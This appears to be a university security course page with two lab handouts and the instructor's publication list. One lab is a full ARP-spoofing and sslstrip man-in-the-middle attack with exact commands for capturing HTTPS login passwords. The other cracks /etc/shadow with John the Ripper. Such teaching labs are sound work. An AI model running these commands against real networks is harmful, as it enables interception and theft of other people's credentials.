All posts by admin

In-class exercise 2: Sniff the https passwords using sslstrip in Kali linux

What you need:  Kali101 Linux  and Windows XP VMs.

Import them in your Virtual box.

User name of kali: root      PWD: SCIA472    (They are Shift+S  Shift+S Shift+I Shift+A 472).

This lab can steal all the passwords in a subnet. Please set the network of them to bridged adapter mode, turn off the firewall of Win XP, and give the WinXP 1024M memory.

1 Find you default gateway and interface connected with the victim in Kali:   netstat  -r

1

In this lab,  it should be   192.168.0.1 and the interface is eth0. Write down them for later reference.

2 Find your WinXP’s IP address (it is the victim) in Window XP:  ipconfig  /all

Write your victim’s IP address.

3 Start a new terminal in Kali, type the following command:

echo  1  >  /proc/sys/net/ipv4/ip_forward

This command enables ip forwarding by writing the value 1 in the file specified path.

Remember to do any MITM we need our box to act like a router and be able to forward packets that does not have its ip address in it as the destination.

4 Now we need to set up iptables, so that it will redirect traffic from port 80 to port 10000.

iptables  -t nat -A PREROUTING -p tcp  –destination-port 80 -j REDIRECT –to-port 10000

It starts iptables. –t=tables, nat=this table is consulted when a packet that creates a new connection is encounted. –A is an instruction to append one or more rules to the accepted chain. PREROUTING is one of the built-ins of the NAT table option. It is for altering packets as soon as they come in. –p specifies a protocol, in this case we said tcp. –destination-port we specify port 80 as the destination port. –j specifies an action. And we follow that with the action of redirect (REDIRECT). We redirect to port 10000 because this is the port sslstrip listens on by default.

5 Now just open up another terminal and get ip address of your victim (ip address of your Windows XP).

6 arpspoof  -i  eth0 (your interface)  -t    victim’s ip (WinXp’s address)     default gateway’s ip (192.168.0.1)

-t= target, Arpspoof basically sends arp replies to the target (you WinXp’s address).

The second ip is gateway’s ip, which is the ip we are “pretending” to be. Essentially we are telling the target that we are the gateway.

7 sslstrip   -k    -l   10000  -w  /root/Desktop/sslstrip.log

-k= kill all the sessions in the progress (forces the target ssl session to restart if already going, allows for the tool to work on sessions already established),  -l= listening on port 10000. –w=write the logs into /root/Desktop/sslstrip.log file.

Now tracking the log file which sslstrip produces.

8 In your 1st terminal in Kali:   tail  -f  /root/Desktop/sslstrip.log

 

10  In Windows XP,  Open IE explore, delete history files,  login your  amazon account and gmail account using a fake password. (you can try the online bank account later).

11  You will see the passwords in plain text  in terminal and sslstrip.log

Take a screenshot showing this in Kali by Applications->Accessories->Screenshot

12  In Windows Xp, Open Firefox,   login your facebook and gmail accout

13  What’s the difference between this results and the previous results?

14 Submit a screen image like this to Blackboard.

2

Refer to: http://robospatula.blogspot.com/2013/12/man-in-the-middle-attack-arpspoof-sslstrip.html

Extra bonus:  (3 points)

15  Open a new terminal:

ifconfig eth0 down

macchanger    -mac  00:22:33:44:55:66    eth0 (my interface)

ifconfig  eth0  up

16  ettercap  -T   -q  -M  arp:remote   /victim’s ip/    /gateway’s ip/

(there is no space between / and IP address)

-T simply specifies text only mode. –q specifies quiet mode. Does not print packet content (since we don’t need this). –I eth0 specifies ethernet 0 as the interface to listen on.

17  sslstrip   -k    -l   10000 -w  /root/Desktop/ettercap.log

In Windows Xp,  start IE explore, login your gmail account. Return to kali machine,

18 Open a new terminal:

tail -f /root/Desktop/ettercap.log  

You can see the passwords in the terminal. Save a screen image.

19 Write down your comments on this lab at the end of your report.

20 Turn it in Blackboard.

In-class Exercise 1: Cracking Passwords with John the Ripper

In-class Exercise 1: Cracking Passwords with John the Ripper (Sharon)

Password protection is important in any platform as is building robust passwords. You will need a copy of Kali Linux, as discussed previously, to perform this exercise. John and Ripper will be used to crack passwords. John performs different types of cracks: single mode; dictionary (wordlist mode), the one performed in this exercise, which applies a dictionary list of passwords for comparison; and brute-force (incremental) mode, which is the slowest of the three modes and attempts every combination of letters and numbers. You can download the Kali Linux and WinXP VMs at   http://ciswww.desu.edu/~xhei/

  • Start Kali virtual machine.
  • Login: root   Password:  SCIA472

Before attempting to crack the existing passwords, enter a few more users to see how fast the passwords can be cracked.

  • root@kali: adduser user1
  • set the password to password
  • root@kali: adduser  user2
  • set the password to P@ssw0rd
  • root@kali: adduser  user3
  • set the password to !P@ssw0rD1

After the three users have been added, you will want to execute John.

  • ApplicationsàBackTrack->Provilege Escalation->Password Attacks->Offline Attacks-> john the ripper
  • root@kali:/pentest/passwords/john#: john /etc/shadow
  • Give it time to see how long it takes for each password to be cracked. Record those times here: User1:______ User2:_______User3:______
  • Refection: Did you notice a correlation between the times it took to crack a password versus the complexity of the password? You should have seen that more complex passwords take longer to recover.
  • Write your comment to this exercise including what you have learned, more practices you can think of, and what can be improved about this exercise.
  • Turn it in Blackboard by Tonight.

2016(1)

Conference:

  • You Cannot Sense My PINs: A Side Channel Attack Deterrent Solution for Touch-enabled Devices.
    Caijin Ling, Xiali Hei, Kam Kong, Michael Peays, and Mohsen Guizani.
    In Proc. of GLOBECOM 2016: 1-7. paper bibtex

 

2015(2)

Conference

  • Musical examination to bridge audio data and sheet music.
    Xunyu Pan, Timothy J Cross, Liangliang Xiao, Xiali Hei.
    IS&T/SPIE Electronic Imaging. International Society for Optics and Photonics, 2015.
    paper
    bibtex
  • Energy-aware real-time scheduling on Heterogeneous Multi-Processor.
    Gang Wang, Wenming Li, Xiali Hei.
    In Proc. of Information Sciences and Systems (CISS), 49th, 2015.paper
    bibtex

 

2014(4)

Conference

  1. Multi-part file encryption for electronic health records cloud
    Xiali Hei, Shan Lin.
    In the Proceedings of the 4th ACM MobiHoc Workshop on Pervasive wireless healthcare, pp. 31-36, paper bibtex
  2. Near field communication based access control for wireless medical devices
    Xiali Hei, Xiaojiang Du, Shan Lin.
    In the Proceedings of the 15th ACM international symposium on Mobile ad hoc networking and computing, pp. 423-424, Best Poster Runner-up Award! paper bibtex

Journal

  1. Patient Infusion Pattern based Access Control Schemes for Wireless Insulin Pump System.
    Xiali Hei, Xiaojiang Du, Shan Lin, Insup Lee, Oleg Sokolsky.
    IEEE Transactions on Parallel and Distributed Systems, 2014. vol. 26, no. 11, pp. 3108-3121, paper bibtex

Dissertation

  1. Security issues and defense methods for wireless medical devices
    Xiali Hei.
    Temple University. PDF. bibtex

Preprint

  1. SHipher: Families of Block Ciphers based on SubSet-Sum Problem.
    Xiali Hei, Binheng Song.
    IACR Cryptology ePrint Archive. PDF bibtex

2013(4)

    Conference

  1. PIPAC: Patient Infusion Pattern based Access Control Scheme for Wireless Insulin Pump System. 
    Xiali Hei, Xiaojiang Du, Shan Lin, and Insup Lee.
    In Proc. of IEEE INFOCOM 2013, Turin, Italy, Apr. 2013. paper   slides  bibtex
  2. Two Vulnerabilities in Android OS Kernel. Highly downloaded!
    Xiali Hei, Xiaojiang Du, and Shan Lin.
    In Proc. of IEEE ICC 2013, Budapest, Hungry, June. 2013. paper  slides  bibtex
    Book

  1. Emerging Security Issues in Wireless Implantable Medical Devices.
    Xiali Hei and Xiaojiang Du. 2013. book bibtex
    Book Chapter

  1. Implantable Medical Device Security.
    Xiaojiang Du, Xiali Hei, Alexandru Samachisa, Marcin Lukowiak, Dong Zhang, Shuhui Li, Jie Wu, Daniel Phillips.
    Telehealthcare Computing and Engineering. Apr 2013. pdf bibtex

2012(2)

    Conference

  1. Two Matrices for Blakleys Secret Sharing Scheme
    Xiali Hei, Xioajiang Du, and Binheng Song.
    In Proc. of IEEE ICC2012. paper bibtex
  2. A Distributed Login Framework for Semi-structured Peer-to-Peer Networks.
    Xiali Hei, Xiaojiang Du, and Binheng Song.
    In Proc. of IEEE ICC2012. 2012. paper bibtex

2011(1)

    Conference

  1. Biometric-based Two-level Secure Access Control for Implantable Medical Devices during Emergencies.
    Xiali Hei, Xiaojiang Du.
    In Proc. of IEEE INFOCOM (mini-conference), April,2011,Shanghai. Acceptance rate=25%. paper bibtex

2010(1)

    Conference

  1. Defending Resource Depletion Attacks on Implantable Medical Devices.
    Xiali Hei, Xiaojiang Du, Jie Wu, Fei Hu.
    In Proc. of 2010 IEEE Global Telecommunications Conference GLOBECOM 2010, pp.1-5, 2010. paper bibtex